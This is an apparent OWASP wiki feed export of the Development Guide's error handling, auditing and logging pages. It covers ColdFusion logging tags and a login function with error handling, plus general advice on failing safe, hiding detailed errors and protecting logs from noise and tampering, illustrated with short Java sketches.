&lt;br /&gt;
*Application level (Application.cfc/cfm)&lt;br /&gt;
&lt;br /&gt;
**Specify custom templates for individual exception types with the cferror tag&lt;br /&gt;
&lt;br /&gt;
**Application.cfc onError method to handle uncaught application exceptions&lt;br /&gt;
&lt;br /&gt;
*System level (ColdFusion Administrator settings)&lt;br /&gt;
&lt;br /&gt;
**Missing Template Handler executes when a requested ColdFusion template is not found&lt;br /&gt;
&lt;br /&gt;
**Site-wide Error Handler executes globally for all unhandled exceptions on the server&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices '''&lt;br /&gt;
&lt;br /&gt;
*Do not allow exceptions to go unhandled&lt;br /&gt;
&lt;br /&gt;
*Do not allow any exceptions to reach the browser&lt;br /&gt;
&lt;br /&gt;
*Display custom error pages to users with an email link for feedback&lt;br /&gt;
&lt;br /&gt;
*Do not enable “Robust Exception Information” in production.&lt;br /&gt;
&lt;br /&gt;
*Specify custom pages for ColdFusion to display in each of the following cases: &lt;br /&gt;
**When a ColdFusion page is missing (the Missing Template Handler page) &lt;br /&gt;
**When an otherwise-unhandled exception error occurs during the processing of a page (the Site-wide Error Handler page) &lt;br /&gt;
**You specify these pages on the Settings page in the Server Settings area of the ColdFusion MX Administrator; for more information, see the ColdFusion MX Administrator Help.&lt;br /&gt;
&lt;br /&gt;
*Use the cferror tag to specify ColdFusion pages to handle specific types of errors. &lt;br /&gt;
&lt;br /&gt;
*Use the cftry, cfcatch, cfthrow, and cfrethrow tags to catch and handle exception errors directly on the page where they occur. &lt;br /&gt;
&lt;br /&gt;
*In CFScript, use the try and catch statements to handle exceptions. &lt;br /&gt;
&lt;br /&gt;
*Use the onError event in Application.cfc to handle exception errors that are not handled by try/catch code on the application pages. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Logging'''&lt;br /&gt;
&lt;br /&gt;
Log files can help with application debugging and provide audit trails for attack detection. ColdFusion provides several logs for different server functions. It leverages the Apache Log4j libraries for customized logging. It also provides logging tags to assist in application debugging. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following is a partial list of ColdFusion log files and their descriptions:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
! Log file !! Description&lt;br /&gt;
|-&lt;br /&gt;
| application.log || Records every ColdFusion MX error reported to a user. Application page errors, including ColdFusion MX syntax, ODBC, and SQL errors, are written to this log file.&lt;br /&gt;
|-&lt;br /&gt;
| exception.log || Records stack traces for exceptions that occur in ColdFusion.&lt;br /&gt;
|-&lt;br /&gt;
| scheduler.log || Records scheduled events that have been submitted for execution. Indicates whether task submission was initiated and whether it succeeded. Provides the scheduled page URL, the date and time executed, and a task ID.&lt;br /&gt;
|-&lt;br /&gt;
| server.log || Records start-up messages and errors for ColdFusion MX.&lt;br /&gt;
|-&lt;br /&gt;
| customtag.log || Records errors generated in custom tag processing.&lt;br /&gt;
|-&lt;br /&gt;
| mail.log || Records errors generated by an SMTP mail server.&lt;br /&gt;
|-&lt;br /&gt;
| mailsent.log || Records messages sent by ColdFusion MX.&lt;br /&gt;
|-&lt;br /&gt;
| flash.log || Records entries for Macromedia Flash Remoting.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The CFAM contains the Logging Settings and log viewer screens. Administrators can configure the log directory, maximum log file size, and maximum number of archives. It also allows administrators to log slow running pages, CORBA calls, and scheduled task execution. The log viewer allows viewing, filtering, and searching of any log files in the log directory (default is cf_root/logs). Administrators can archive, save, and delete log files as well.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The cflog and cftrace tags allow developers to create customized logging. &amp;lt;cflog&amp;gt; can write custom messages to the Application.log, Scheduler.log, or a custom log file. The custom log file must be in the default log directory – if it does not exist, ColdFusion will create it. &amp;lt;cftrace&amp;gt; tracks execution times, logic flow, and variables at the time the tag executes. It records the data in cftrace.log (in the default logs directory) and can display this information either inline or in the debugging output of the current page request. Use &amp;lt;cflog&amp;gt; to write custom error messages, track user logins, and record user activity to a custom log file. Use &amp;lt;cftrace&amp;gt; to track variables and application state within running requests.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cflog&amp;gt; for customized logging&lt;br /&gt;
&lt;br /&gt;
**Incorporate it into custom error handling&lt;br /&gt;
&lt;br /&gt;
**Record application-specific messages&lt;br /&gt;
&lt;br /&gt;
*Actively monitor and fix errors in ColdFusion’s logs&lt;br /&gt;
&lt;br /&gt;
*Optimize logging settings &lt;br /&gt;
&lt;br /&gt;
**Rotate log files to keep them current &lt;br /&gt;
&lt;br /&gt;
**Keep file sizes manageable&lt;br /&gt;
&lt;br /&gt;
*Enable logging of slow running pages&lt;br /&gt;
&lt;br /&gt;
**Set the time interval lower than the configured Timeout Request value in the CFAM Settings screen&lt;br /&gt;
&lt;br /&gt;
**Long running page timings are recorded in the server.log&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cftrace&amp;gt; sparingly for audit trails&lt;br /&gt;
&lt;br /&gt;
**Use it with inline=“false”&lt;br /&gt;
&lt;br /&gt;
**Use it to track user input – Form and/or URL variables&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''Best Practices in Action'''''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following code adds error handling and logging to the dbLogin and logout methods from the code in the Authentication section.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif IsValid(&amp;quot;regex&amp;quot;, arguments.strUserName, &amp;quot;[A-Za-z0-9%]*&amp;quot;) AND IsValid(&amp;quot;regex&amp;quot;, arguments.strPassword, &amp;quot;[A-Za-z0-9%]*&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfquery name=&amp;quot;loginQuery&amp;quot; dataSource=&amp;quot;#Application.DB#&amp;quot; &amp;gt;&lt;br /&gt;
&lt;br /&gt;
		SELECT hashed_password, salt&lt;br /&gt;
&lt;br /&gt;
		FROM UserTable&lt;br /&gt;
&lt;br /&gt;
		WHERE UserName =&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfqueryparam value=&amp;quot;#strUserName#&amp;quot; cfsqltype=&amp;quot;CF_SQL_VARCHAR&amp;quot; maxlength=&amp;quot;25&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfquery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfif loginQuery.hashed_password EQ Hash(strPassword &amp;amp; loginQuery.salt, &amp;quot;SHA-256&amp;quot; )&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;YES&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset Session.UserName = strUserName&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cflog text=&amp;quot;#getAuthUser()# has logged in!&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		  	type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;!-- Add code to get roles from database --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		  &amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;cfcatch type=&amp;quot;database&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  	&amp;lt;cflog text=&amp;quot;Error in dbLogin(). #cfcatch.details#&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	  		type=&amp;quot;Error&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			log=&amp;quot;Application&amp;quot; &lt;br /&gt;
&lt;br /&gt;
			application=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfset retargs.authenticated=&amp;quot;NO&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
		&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	  &amp;lt;/cfcatch&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cftry&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfreturn retargs&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;logout&amp;quot; access=&amp;quot;remote&amp;quot; output=&amp;quot;true&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;logintype&amp;quot; type=&amp;quot;string&amp;quot; required=&amp;quot;yes&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif isDefined(&amp;quot;form.logout&amp;quot;)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflogout&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset StructClear(Session)&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	&amp;lt;cflog text=&amp;quot;#getAuthUser()# has been logged out.&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		type=&amp;quot;Information&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		file=&amp;quot;access&amp;quot; &lt;br /&gt;
&lt;br /&gt;
		application=&amp;quot;yes&amp;quot;&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfif arguments.logintype eq &amp;quot;challenge&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset foo = closeBrowser()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfelse&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--- replace this URL to a page logged out users should see ---&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cflocation url=&amp;quot;login.cfm&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cfif&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/cffunction&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Error Handling]]&lt;br /&gt;
[[Category:Logging]]&lt;br /&gt;
[[Category:OWASP Logging Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59848</id>
		<title>Error Handling, Auditing and Logging</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59848"/>
				<updated>2009-05-02T10:40:15Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Objective */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
Many industries are subject to legal and regulatory requirements that their applications be:&lt;br /&gt;
&lt;br /&gt;
* Auditable – all activities that affect user state or balances are formally tracked&lt;br /&gt;
&lt;br /&gt;
* Traceable – it’s possible to determine where an activity occurs in all tiers of the application&lt;br /&gt;
&lt;br /&gt;
* High integrity – logs cannot be overwritten or tampered with by local or remote users&lt;br /&gt;
&lt;br /&gt;
Well-written applications use logs and activity traces for both audit and monitoring, and make it easy to track a transaction without excessive effort or access to the system. They should make it possible to track and identify potential fraud or anomalies end-to-end.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed, but in particular:&lt;br /&gt;
&lt;br /&gt;
DS11.4 Source data error handling&lt;br /&gt;
&lt;br /&gt;
DS11.8 Data input error handling&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Error handling, debug messages, auditing and logging are different aspects of the same topic: how to track events within an application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Best practices ==&lt;br /&gt;
&lt;br /&gt;
* Fail safe – do not fail open&lt;br /&gt;
&lt;br /&gt;
* Dual purpose logs&lt;br /&gt;
&lt;br /&gt;
* Audit logs are legally protected – protect them&lt;br /&gt;
&lt;br /&gt;
* Report on and search logs using a read-only copy or a complete replica &lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
Error handling takes two forms: structured exception handling and functional error checking. Structured exception handling is always preferred, as it makes it easier to cover 100% of code. In languages that lack exceptions, such as PHP 4, and rely on functional error checking, it is very hard to cover 100% of all errors. Code that covers 100% of errors is extraordinarily verbose and difficult to read, and can contain subtle bugs and errors in the error handling code itself.&lt;br /&gt;
&lt;br /&gt;
Motivated attackers like to see error messages as they might leak information that leads to further attacks, or may leak privacy related information. Web application error handling is rarely robust enough to survive a penetration test. &lt;br /&gt;
&lt;br /&gt;
Applications should always fail safe. If an application fails to an unknown state, an attacker may be able to exploit this indeterminate state to access unauthorized functionality, or worse, to create, modify or destroy data.&lt;br /&gt;
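&lt;br /&gt;
The fail-safe principle can be sketched as a default-deny access decision (a minimal Java illustration, not part of the original guide; the role and grant names are hypothetical):&lt;br /&gt;

```java
public class AccessDecision {
    // Fail safe: start from DENY and only flip to ALLOW when every check
    // succeeds. An exception anywhere leaves the decision at DENY.
    public static boolean decide(String user, String resource) {
        boolean allowed = false; // default-deny
        try {
            if ("admin".equals(user)) {
                allowed = hasGrant(user, resource);
            }
        } catch (RuntimeException e) {
            allowed = false; // an indeterminate state must never grant access
        }
        return allowed;
    }

    // Hypothetical grant lookup; stands in for a real policy store.
    private static boolean hasGrant(String user, String resource) {
        return "/admin".equals(resource);
    }
}
```

The important property is that every failure path converges on denial, never on whatever value happened to be set last.&lt;br /&gt;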
&lt;br /&gt;
===Fail safe ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s fatal error handler.&lt;br /&gt;
&lt;br /&gt;
* Does it fail safe? If so, how?&lt;br /&gt;
&lt;br /&gt;
* Is the fatal error handler called frequently enough?&lt;br /&gt;
&lt;br /&gt;
* What happens to in-flight transactions and ephemeral data?&lt;br /&gt;
&lt;br /&gt;
===Debug errors ===&lt;br /&gt;
&lt;br /&gt;
* Does production code contain debug error handlers or messages?  &lt;br /&gt;
&lt;br /&gt;
* If the language is a scripting language without effective pre-processing or compilation, can the debug flag be turned on in the browser?&lt;br /&gt;
&lt;br /&gt;
* Do the debug messages leak privacy related information, or information that may lead to further successful attack?&lt;br /&gt;
&lt;br /&gt;
===Exception handling ===&lt;br /&gt;
&lt;br /&gt;
* Does the code use structured exception handlers (try {} catch {} etc) or function-based error handling? &lt;br /&gt;
&lt;br /&gt;
* If the code uses function-based error handling, does it check every return value and handle the error appropriately?&lt;br /&gt;
&lt;br /&gt;
* Would fuzz injection against the average interface fail? &lt;br /&gt;
&lt;br /&gt;
===Functional return values ===&lt;br /&gt;
&lt;br /&gt;
Many languages indicate an error condition by return value. E.g.:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$query = mysql_query("SELECT * FROM table WHERE id=4", $conn);&lt;br /&gt;
&lt;br /&gt;
if ( $query === false ) {&lt;br /&gt;
&lt;br /&gt;
		// error&lt;br /&gt;
&lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Are all functional errors checked? If not, what can go wrong?&lt;br /&gt;
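&lt;br /&gt;
The contrast between the two styles can be sketched in Java (an illustration, not from the original guide): a sentinel return value is easy for callers to ignore, while a structured handler makes the error path explicit and local:&lt;br /&gt;

```java
public class ErrorStyles {
    // Function-based style: the caller must remember to check the sentinel.
    // Forgetting a single null check silently swallows the error.
    static Integer tryParse(String s) {
        try {
            return Integer.valueOf(s);
        } catch (NumberFormatException e) {
            return null; // sentinel value; easy for callers to ignore
        }
    }

    // Structured style: the failure cannot pass unnoticed unless the
    // caller explicitly writes a catch block for it.
    static int parseOrDefault(String s, int fallback) {
        try {
            return Integer.parseInt(s);
        } catch (NumberFormatException e) {
            // the error path is explicit and handled where it occurs
            return fallback;
        }
    }
}
```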
&lt;br /&gt;
==Detailed error messages ==&lt;br /&gt;
&lt;br /&gt;
Detailed error messages provide attackers with a mountain of useful information.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable  ===&lt;br /&gt;
&lt;br /&gt;
* Are detailed error messages turned on? &lt;br /&gt;
&lt;br /&gt;
* Do the detailed error messages leak information that may be used to stage a further attack, or leak privacy related information? &lt;br /&gt;
&lt;br /&gt;
* Does the browser cache the error message?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Ensure that your application has a “safe mode” to which it can return if something truly unexpected occurs. If all else fails, log the user out and close the browser window.&lt;br /&gt;
&lt;br /&gt;
Production code should not be capable of producing debug messages. If it is, debug mode should be triggered by editing a file or configuration option on the server. In particular, debug should not be an option that can be enabled in the application itself.&lt;br /&gt;
&lt;br /&gt;
If the framework or language has a structured exception handler (i.e. try {} catch {}), it should be used in preference to functional error handling.&lt;br /&gt;
&lt;br /&gt;
If the application uses functional error handling, its use must be comprehensive and thorough.&lt;br /&gt;
&lt;br /&gt;
Detailed error messages, such as stack traces or messages leaking privacy related information, should never be presented to the user. Instead, a generic error message should be used. This includes HTTP status response codes (e.g. 404 Not Found or 500 Internal Server Error).&lt;br /&gt;
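&lt;br /&gt;
One common way to achieve this (a minimal Java sketch; the logger name and message wording are illustrative) is to log the full exception server-side under a random reference ID and return only a generic message carrying that ID:&lt;br /&gt;

```java
import java.util.UUID;
import java.util.logging.Level;
import java.util.logging.Logger;

public class SafeErrors {
    private static final Logger LOG = Logger.getLogger("app");

    // Returns the generic text that is safe to render to the user.
    // The stack trace and exception details only reach the server log.
    public static String handle(Exception e) {
        String ref = UUID.randomUUID().toString();
        LOG.log(Level.SEVERE, "Unhandled error, ref=" + ref, e);
        return "An internal error occurred. Reference: " + ref;
    }
}
```

The reference ID lets support staff locate the detailed server-side record without any detail reaching the browser.&lt;br /&gt;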
&lt;br /&gt;
==Logging ==&lt;br /&gt;
&lt;br /&gt;
===Where to log to? ===&lt;br /&gt;
&lt;br /&gt;
Logs should be written so that the log file's attributes allow only new information to be appended (older records cannot be rewritten or deleted). For added security, logs should also be written to a write once / read many device such as a CD-R.&lt;br /&gt;
&lt;br /&gt;
Copies of log files should be made at regular intervals depending on volume and size (daily, weekly, monthly, etc.).  A common naming convention should be adopted with regards to logs, making them easier to index. Verification that logging is still actively working is overlooked surprisingly often, and can be accomplished via a simple cron job!&lt;br /&gt;
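&lt;br /&gt;
The verification can be as simple as checking that the log file has been written to recently; a sketch of what such a scheduled job would test (the threshold and file name are illustrative):&lt;br /&gt;

```java
import java.io.File;

public class LogFreshness {
    // True if the log exists and was modified within the last maxAgeMillis.
    // A cron-style job can alert when this turns false, i.e. when logging
    // has silently stopped.
    public static boolean recentlyWritten(File log, long maxAgeMillis) {
        if (!log.exists()) {
            return false;
        }
        long age = System.currentTimeMillis() - log.lastModified();
        if (age > maxAgeMillis) {
            return false;
        }
        return true;
    }
}
```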
&lt;br /&gt;
Make sure data is not overwritten.&lt;br /&gt;
&lt;br /&gt;
Log files should be copied and moved to permanent storage and incorporated into the organization's overall backup strategy.&lt;br /&gt;
&lt;br /&gt;
Log files and media should be deleted and disposed of properly and incorporated into an organization's shredding or secure media disposal plan. Reports should be generated on a regular basis, including error reporting and anomaly detection trending.&lt;br /&gt;
&lt;br /&gt;
Be sure to keep logs safe and confidential even when backed up.&lt;br /&gt;
&lt;br /&gt;
===Handling ===&lt;br /&gt;
&lt;br /&gt;
Logs can be fed into real time intrusion detection and performance and system monitoring tools. All logging components should be synced with a timeserver so that all logging can be consolidated effectively without latency errors. This time server should be hardened and should not provide any other services to the network.&lt;br /&gt;
&lt;br /&gt;
Logs must not be manipulated or deleted while they are being analyzed.&lt;br /&gt;
&lt;br /&gt;
===General Debugging ===&lt;br /&gt;
&lt;br /&gt;
Logs are useful in reconstructing events after a problem has occurred, security related or not. Event reconstruction can allow a security administrator to determine the full extent of an intruder's activities and expedite the recovery process.&lt;br /&gt;
&lt;br /&gt;
===Forensics evidence ===&lt;br /&gt;
&lt;br /&gt;
Logs may in some cases be needed in legal proceedings to prove wrongdoing. In this case, the actual handling of the log data is crucial.&lt;br /&gt;
&lt;br /&gt;
===Attack detection ===&lt;br /&gt;
&lt;br /&gt;
Logs are often the only record that suspicious behavior is taking place; therefore logs can sometimes be fed in real time directly into intrusion detection systems.&lt;br /&gt;
&lt;br /&gt;
===Quality of service ===&lt;br /&gt;
&lt;br /&gt;
Repeated polls can be logged so that network outages or server shutdowns are recorded, and the behavior can either be analyzed later on or a responsible person can take immediate action.&lt;br /&gt;
&lt;br /&gt;
===Proof of validity ===&lt;br /&gt;
&lt;br /&gt;
Application developers sometimes write logs to prove to customers that their applications are behaving as expected.&lt;br /&gt;
&lt;br /&gt;
* Required by law or corporate policies.&lt;br /&gt;
&lt;br /&gt;
* Logs can provide individual accountability in the web application system universe by tracking a user's actions.&lt;br /&gt;
&lt;br /&gt;
It can be corporate policy or local law that requires, for example, saving the header information of all application transactions. These logs must then be kept safe and confidential for six months before they can be deleted.&lt;br /&gt;
&lt;br /&gt;
The points above reflect different motivations and result in different requirements and strategies. This means that before we can implement a logging mechanism in an application or system, we have to know the requirements and how the logs will later be used. Failing to do so can lead to unintended results.&lt;br /&gt;
&lt;br /&gt;
Failure to enable or design the proper event logging mechanisms in the web application may undermine an organization's ability to detect unauthorized access attempts, and the extent to which these attempts may or may not have succeeded. We will look into the most common attack methods, design and implementation errors, as well as the mitigation strategies later on in this chapter.&lt;br /&gt;
&lt;br /&gt;
There is another reason why the logging mechanism must be planned before implementation. In some countries, laws define what kinds of personal information may be logged and whether they may be analyzed. For example, in Switzerland, companies are not allowed to log personal information about their employees (such as what they do on the internet or what they write in their emails). So if a company wants to log a worker's surfing habits, it must inform the worker of its plans in advance.&lt;br /&gt;
&lt;br /&gt;
This leads to the requirement of having anonymized or de-personalized logs, with the ability to re-personalize them later if need be. If an unauthorized person has access to (legally) personalized logs, the corporation is acting unlawfully. So there are a few traps, not only legal ones, that must be kept in mind.&lt;br /&gt;
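&lt;br /&gt;
De-personalization with later re-personalization can be sketched with a keyed hash (a minimal Java illustration): each user identifier is replaced by an HMAC token, deterministic so activity can still be correlated, and reversible only by whoever holds the key plus a token-to-user lookup table:&lt;br /&gt;

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class LogPseudonym {
    // De-personalize a user identifier for logging. The same input and key
    // always yield the same token, so activity can still be correlated;
    // only the key holder can map tokens back to users via a lookup table.
    public static String pseudonym(String userId, byte[] key) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        byte[] digest = mac.doFinal(userId.getBytes("UTF-8"));
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i != 8; i++) { // a short token suffices for correlation
            sb.append(String.format("%02x", digest[i]));
        }
        return sb.toString();
    }
}
```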
&lt;br /&gt;
===Logging types ===&lt;br /&gt;
&lt;br /&gt;
Logs can contain different kinds of data. The selection of the data used is normally affected by the motivation leading to the logging. This section contains information about the different types of logging information and the reasons why we could want to log them.&lt;br /&gt;
&lt;br /&gt;
In general, the logging features include appropriate debugging information such as time of event, initiating process or owner of process, and a detailed description of the event. The following are types of system events that can be logged in an application. Which of them are used in the logs depends on the particular application or system and its needs:&lt;br /&gt;
&lt;br /&gt;
* Reading of data: log file access and what kind of data is read. This allows one to see not only whether data was read, but also by whom and when.&lt;br /&gt;
&lt;br /&gt;
* Writing of data: also log where and in what mode (append, replace) data was written. This can be used to see whether data was overwritten, or whether a program is writing at all.&lt;br /&gt;
&lt;br /&gt;
* Modification of any data characteristics, including access control permissions or labels, location in database or file system, or data ownership. Administrators can detect if their configurations were changed.&lt;br /&gt;
&lt;br /&gt;
* Administrative functions and changes in configuration regardless of overlap (account management actions, viewing any user's data, enabling or disabling logging, etc.)&lt;br /&gt;
&lt;br /&gt;
* Miscellaneous debugging information that can be enabled or disabled on the fly.&lt;br /&gt;
&lt;br /&gt;
* All authorization attempts (including time), with success/failure, the resource or function being authorized, and the user requesting authorization. With these logs we can detect password guessing. These kinds of logs can be fed into an Intrusion Detection system that will detect anomalies.&lt;br /&gt;
&lt;br /&gt;
* Deletion of any data (object). Sometimes applications are required to have some sort of versioning in which the deletion process can be cancelled.&lt;br /&gt;
&lt;br /&gt;
* Network communications (bind, connect, accept, etc.). With this information an Intrusion Detection system can detect port scanning and brute force attacks.&lt;br /&gt;
&lt;br /&gt;
* All authentication events (logging in, logging out, failed logins, etc.), which also make it possible to detect brute force and guessing attacks.&lt;br /&gt;
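&lt;br /&gt;
Whichever of these event types are selected, each entry should carry the same core fields named above. A minimal sketch of one entry format (the pipe-delimited layout and field order are illustrative, not a standard):&lt;br /&gt;

```java
import java.time.Instant;

public class AuditEntry {
    // Build one audit line with the core fields discussed above:
    // time of event, acting user, event type, target resource, and outcome.
    public static String format(Instant when, String user, String event,
                                String resource, boolean success) {
        return String.join("|",
                when.toString(),
                user,
                event,
                resource,
                success ? "SUCCESS" : "FAILURE");
    }
}
```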
&lt;br /&gt;
==Noise ==&lt;br /&gt;
&lt;br /&gt;
Noise is intentionally invoking security errors to fill an error log with entries (noise) that hide the incriminating evidence of a successful intrusion. When the administrator or log parser application reviews the logs, there is every chance that they will write off the volume of log entries as a denial of service attempt rather than identify the 'needle in the haystack'.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
This is difficult, since applications usually offer an unimpeded route to functions capable of generating log events. If you can deploy an intelligent device or application component that can shun an attacker after repeated attempts, that is beneficial. Failing that, use an error log audit tool that can reduce the bulk of the noise, for example based on repetition of events or on events originating from the same source. It is also useful if the log viewer can display events in order of severity level, rather than just by time.&lt;br /&gt;
&lt;br /&gt;
==Cover Tracks ==&lt;br /&gt;
&lt;br /&gt;
The top prize in logging mechanism attacks goes to the contender who can delete or manipulate log entries at a granular level, &amp;quot;as though the event never even happened&amp;quot;. Intrusion and deployment of rootkits allow an attacker to use specialized tools that may assist or automate the manipulation of known log files. In most cases, log files can only be manipulated by users with root / administrator privileges, or via approved log manipulation applications. As a general rule, logging mechanisms should aim to prevent manipulation at a granular level, since otherwise an attacker can hide their tracks for a considerable length of time without being detected. A simple question: if you were being compromised by an attacker, would the intrusion be more obvious if your log file were abnormally large or small, or if it appeared like every other day's log?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assign log files the highest security protection, providing reassurance that you always have an effective 'black box' recorder if things go wrong. This includes:&lt;br /&gt;
&lt;br /&gt;
*Applications should not run with Administrator, or root-level privileges. This is the main cause of log file manipulation success since super users typically have full file system access. Assume the worst case scenario and suppose your application is exploited. Would there be any other security layers in place to prevent the application's user privileges from manipulating the log file to cover tracks?&lt;br /&gt;
&lt;br /&gt;
*Ensuring that the access privileges protecting the log files are restrictive, reducing the operations possible against the log file to append and read.&lt;br /&gt;
&lt;br /&gt;
*Ensuring that log files are assigned object names that are not obvious and stored in a safe location of the file system.&lt;br /&gt;
&lt;br /&gt;
*Writing log files using publicly or formally scrutinized techniques in an attempt to reduce the risk associated with reverse engineering or log file manipulation.&lt;br /&gt;
&lt;br /&gt;
*Writing log files to read-only media (where event log integrity is of critical importance).&lt;br /&gt;
&lt;br /&gt;
